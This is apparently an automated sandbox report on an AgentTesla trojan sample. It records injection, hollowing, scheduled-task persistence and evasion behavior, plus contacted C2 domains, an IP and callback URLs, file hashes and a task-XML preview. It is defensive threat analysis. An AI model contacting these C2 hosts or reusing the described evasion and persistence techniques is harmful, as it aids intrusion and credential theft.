          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing22Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491397 Sample: 456yqMyHvT.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 39 www.desireezzplus.com 2->39 41 desireezzplus.com 2->41 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for dropped file 2->49 51 6 other signatures 2->51 11 456yqMyHvT.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Roaming\dWAzsHjHs.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\Local\...\tmp9071.tmp, XML 11->35 dropped 37 C:\Users\user\AppData\...\456yqMyHvT.exe.log, ASCII 11->37 dropped 63 Detected unpacking (changes PE section rights) 11->63 65 Detected unpacking (overwrites its own PE header) 11->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 11->67 69 Tries to detect virtualization through RDTSC time measurements 11->69 15 456yqMyHvT.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Sample uses process hollowing technique 15->75 77 Queues an APC in another process (thread injection) 15->77 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 43 www.zaborski.pro 91.237.52.145, 49852, 80 BIZNESHOST-ASPL Poland 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 26 WWAHost.exe 20->26         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 26->55 57 Modifies the context of a thread in another process (thread injection) 26->57 59 Maps a DLL or memory area into another process 26->59 61 Tries to detect virtualization through RDTSC time measurements 26->61 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          456yqMyHvT.exe33%VirustotalBrowse
          456yqMyHvT.exe33%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\dWAzsHjHs.exe33%ReversingLabsWin32.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.456yqMyHvT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.456yqMyHvT.exe.d20000.0.unpack100%AviraHEUR/AGEN.1109526Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RB0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.themmbcollection.com/gst0/3%VirustotalBrowse
          www.themmbcollection.com/gst0/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          desireezzplus.com
          		66.254.114.234
          		truetrue
            		unknown
            www.zaborski.pro
            		91.237.52.145
            		truetrue
              		unknown
              www.desireezzplus.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.themmbcollection.com/gst0/true
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                		low
                http://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIbtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersG456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                      		high
                      http://www.rspb.org.uk/wildlife/birdguide/name/456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers/?456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bThe456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.kr456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBWWAHost.exe, 0000000F.00000002.926336110.00000000046BF000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.coml456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netD456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlN456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cThe456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htm456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-user.html456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPlease456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fonts.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.kr456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPlease456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cn456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sakkal.com456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      91.237.52.145
                                      		www.zaborski.proPoland
                                      		198414BIZNESHOST-ASPLtrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491397
                                      Start date:27.09.2021
                                      Start time:14:51:07
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 32s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:456yqMyHvT.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@10/4@2/1
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 29.9% (good quality ratio 26.4%)
                                      • Quality average: 70.1%
                                      • Quality standard deviation: 33.6%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.209.183, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.50.102.62
                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      14:52:08API Interceptor1x Sleep call for process: 456yqMyHvT.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      91.237.52.145Letter of Intent.exeGet hashmaliciousBrowse
                                      • www.zaborski.pro/m6ss/?7n=7/j0B0axwH2j3JBDP7CtO0aObcGJZ+oUQ/jluRQiGqQJKat0tYWa/1OyCbBuHL+N+Wiv&4hUtXx=3f-lGjm8UxNL

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.zaborski.proLetter of Intent.exeGet hashmaliciousBrowse
                                      • 91.237.52.145

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      BIZNESHOST-ASPLLetter of Intent.exeGet hashmaliciousBrowse
                                      • 91.237.52.145
                                      Axo7v2d4Ya.exeGet hashmaliciousBrowse
                                      • 91.237.52.247
                                      KBzeB23bE1.exeGet hashmaliciousBrowse
                                      • 91.239.67.153
                                      $RAULIU9.exeGet hashmaliciousBrowse
                                      • 91.239.67.153

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Roaming\dWAzsHjHs.exe201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsxGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\456yqMyHvT.exe.log
                                        Process:C:\Users\user\Desktop\456yqMyHvT.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1309
                                        Entropy (8bit):5.3528008810928345
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                        MD5:542338C5A30B02E372089FECDC54D607
                                        SHA1:6FAD29FF14686FC847B160E876C1E078333F6DCB
                                        SHA-256:6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
                                        SHA-512:FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\tmp9071.tmp
                                        Process:C:\Users\user\Desktop\456yqMyHvT.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1642
                                        Entropy (8bit):5.181020070278833
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGKDPtn:cbhK79lNQR/rydbz9I3YODOLNdq3HF
                                        MD5:270EAE4DAD8B2E88B410A217642952E6
                                        SHA1:14F2734C138B4B5E1F71EB262C19D9D8D6BFAB65
                                        SHA-256:EF0067940C6DC3971D1971768F6BE91584F2F95B50754C5C1FACDF92FB1E1CB4
                                        SHA-512:3B3BBFF06C965D453ED8536B7CC46BEC625008721FB147F5C9B66AFE8873ED05A37566413C439F3D0AC1558246411CA372B00612137F4787DBF7DD047305645E
                                        Malicious:true
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        C:\Users\user\AppData\Roaming\dWAzsHjHs.exe
                                        Process:C:\Users\user\Desktop\456yqMyHvT.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1205248
                                        Entropy (8bit):6.865266394826885
                                        Encrypted:false
                                        SSDEEP:24576:s9YKH24J/IJ1/BuQ1Pn8Q96oOxBEF+hZF+u:sue2G8tBd8Q96oO00Z
                                        MD5:001122F11AE95A3C00EB3E76541BC264
                                        SHA1:750E1254A82C6E21AB5CFBA176363F0112089F65
                                        SHA-256:B25EF1151578640A5BB9E01FADA60A8792FC4D3E92F3DDABF19BA4CD6D630F57
                                        SHA-512:F57ABFEE1A9264DAD15DCC70539BEB16C4BE5735CEE0F085B349D0093DF6997D185475EB47DA19265E6D2DCAF0D631CD7AF04FF31ACB3E0E030A2CB26AAA8655
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 33%
                                        Joe Sandbox View:
                                        • Filename: 201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsx, Detection: malicious, Browse
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@.................................d...W.......0............................................................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc...............b..............@..B........................H............T......j.........................................................3.}...T..o.Z.it....&.z<nw...Q..o.H|....e....(..@...>.._.2;t...E.YL.../0\....*....\e..q........%[_...G.... ..AF...u..?.].om=.G...)2..4......C..._.....4l...`..q....^?.....y..?Q.o8......)rRD.....u.sl...8q.}.T.i..o2<...N.F4..9...)..........sq..q......h.t_.gkg.G.{..M:/...F..k.F....n..+........|p.~-..L^.......+./.dh.Q..X....M. ..U.2....p9..F.I...R{1.@t.8@/c..s\...."..O;.<vv~u7..;?.?...
                                        C:\Users\user\AppData\Roaming\dWAzsHjHs.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\456yqMyHvT.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):6.865266394826885
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:456yqMyHvT.exe
                                        File size:1205248
                                        MD5:001122f11ae95a3c00eb3e76541bc264
                                        SHA1:750e1254a82c6e21ab5cfba176363f0112089f65
                                        SHA256:b25ef1151578640a5bb9e01fada60a8792fc4d3e92f3ddabf19ba4cd6d630f57
                                        SHA512:f57abfee1a9264dad15dcc70539beb16c4be5735cee0f085b349d0093df6997d185475eb47da19265e6d2dcaf0d631cd7af04ff31acb3e0e030a2cb26aaa8655
                                        SSDEEP:24576:s9YKH24J/IJ1/BuQ1Pn8Q96oOxBEF+hZF+u:sue2G8tBd8Q96oO00Z
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:138e8eccece8cccc

                                        Static PE Info

                                        General

                                        Entrypoint:0x50e9be
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x61511506 [Mon Sep 27 00:49:10 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x10e9640x57.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1100000x19430.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x10c9c40x10ca00False0.649662633783data7.02347259021IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x1100000x194300x19600False0.391664100985data4.29516630678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x12a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x1101f00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0x120a180x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                        RT_ICON0x124c400x25a8data
                                        RT_ICON0x1271e80x10a8data
                                        RT_ICON0x1282900x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x1286f80x4cdata
